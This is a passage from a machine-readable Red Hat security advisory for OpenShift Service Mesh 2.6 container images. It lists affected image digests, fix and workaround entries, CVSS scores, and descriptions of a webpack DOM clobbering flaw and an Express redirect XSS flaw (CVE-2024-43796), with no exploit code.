"vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: 